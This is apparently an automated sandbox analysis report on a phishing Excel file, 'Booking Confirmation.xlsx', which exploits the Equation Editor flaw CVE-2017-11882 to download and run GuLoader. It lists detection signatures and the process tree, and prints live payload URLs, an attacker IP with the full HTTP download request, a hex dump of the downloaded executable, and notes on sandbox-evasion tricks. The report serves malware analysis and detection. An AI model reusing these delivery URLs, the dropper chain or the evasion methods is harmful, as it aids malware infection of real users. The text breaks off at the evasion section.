Loading ...

Play interactive tourEdit tour

Analysis Report Booking Confirmation.xlsx

Overview

General Information

Sample Name:Booking Confirmation.xlsx
Analysis ID:433966
MD5:0ff57b2fd3fb489d3cca1e3de4fc98ea
SHA1:48f428a33c81e6647c399a50a71e5ee03c1c2ef9
SHA256:36e8b5e6839f88f144b51f690004f0464368d437d099fa74534fe1a6223a6ed2
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2404 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2616 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2760 cmdline: 'C:\Users\Public\vbc.exe' MD5: EE83942376EA5717149517FCC832AB9F)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
      C:\Users\Public\vbc.exeJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.0.vbc.exe.400000.0.unpackJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
            4.2.vbc.exe.400000.1.unpackJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

              Sigma Overview

              Exploits:

              barindex
              Sigma detected: EQNEDT32.EXE connecting to internetShow sources
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.155.82.236, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2616, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
              Sigma detected: File Dropped By EQNEDT32EXEShow sources
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2616, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe

              System Summary:

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2616, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2760
              Sigma detected: Execution from Suspicious FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2616, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2760

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus detection for URL or domainShow sources
              Source: https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.binAvira URL Cloud: Label: malware
              Antivirus detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeAvira: detection malicious, Label: HEUR/AGEN.1134908
              Source: C:\Users\Public\vbc.exeAvira: detection malicious, Label: HEUR/AGEN.1134908
              Found malware configurationShow sources
              Source: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin"}
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeVirustotal: Detection: 28%Perma Link
              Source: C:\Users\Public\vbc.exeVirustotal: Detection: 28%Perma Link
              Multi AV Scanner detection for submitted fileShow sources
              Source: Booking Confirmation.xlsxReversingLabs: Detection: 26%

              Exploits:

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: excel.exeMemory has grown: Private usage: 4MB later: 70MB
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 103.155.82.236:80
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 14 Jun 2021 06:54:23 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Sun, 13 Jun 2021 20:01:48 GMTETag: "24000-5c4ab36086dc4"Accept-Ranges: bytesContent-Length: 147456Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 40 bb 60 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 10 02 00 00 30 00 00 00 00 00 00 a4 18 00 00 00 10 00 00 00 20 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 05 58 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 17 02 00 28 00 00 00 00 40 02 00 30 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 0e 02 00 00 10 00 00 00 10 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 20 02 00 00 10 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 09 00 00 00 40 02 00 00 10 00 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
              Source: global trafficHTTP traffic detected: GET /nrsdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.82.236Connection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0F13A2C.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /nrsdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.82.236Connection: Keep-Alive
              Source: F7B97C3D.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0

              System Summary:

              barindex
              Office equation editor drops PE fileShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
              Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C6E96 NtAllocateVirtualMemory,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C7008 NtAllocateVirtualMemory,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C6E50 NtAllocateVirtualMemory,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C7084 NtAllocateVirtualMemory,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C6EE4 NtAllocateVirtualMemory,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C711E NtAllocateVirtualMemory,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C6F73 NtAllocateVirtualMemory,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004018A4
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405732
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C6E96
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003CB831
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C7428
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C482B
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C3427
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C3827
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C2A1C
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C0A1E
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C3C13
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C767F
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C3C73
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C6A6F
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003CAA61
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C2A5F
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C6E50
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C3A43
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C38A5
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C48A3
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C6A9F
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C22F7
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C6EE4
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C76DF
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C3AD7
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C48C5
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C333D
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C4927
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C7507
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C757B
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C3B73
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C6F73
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C4D68
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C3947
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C39B8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C479E
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C4D80
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C75F7
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C37F2
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C0BDB
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C47D2
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C33CF
              Source: Booking Confirmation.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: svchost[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/17@0/1
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Booking Confirmation.xlsxJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF0B4.tmpJump to behavior
              Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Booking Confirmation.xlsxReversingLabs: Detection: 26%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: Booking Confirmation.xlsxStatic file information: File size 1286656 > 1048576
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Booking Confirmation.xlsxInitial sample: OLE indicators vbamacros = False
              Source: Booking Confirmation.xlsxInitial sample: OLE indicators encrypted = True

              Data Obfuscation:

              barindex
              Yara detected GuLoaderShow sources
              Source: Yara matchFile source: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
              Yara detected GuLoaderShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, type: DROPPED
              Source: Yara matchFile source: C:\Users\Public\vbc.exe, type: DROPPED
              Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004059CC pushfd ; iretd
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00406199 push ss; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00407E0A push ecx; iretd
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004062BD push ss; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402F0B push dword ptr [ebp-1Ch]; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00409B16 push ecx; retf
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C1017 push 3966E195h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C2C7F push 8566E195h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C1697 push 9EF9818Fh; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C6D0B push 3966E195h; retf
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C2DEF push F6C88495h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C05EB push 38BAFB8Fh; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C1FE7 push F7BAE195h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C1DC7 push 38BAE195h; ret
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: Booking Confirmation.xlsxStream path 'EncryptedPackage' entropy: 7.99982364057 (max. 8.0)

              Malware Analysis System Evasion:

              barindex
              Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
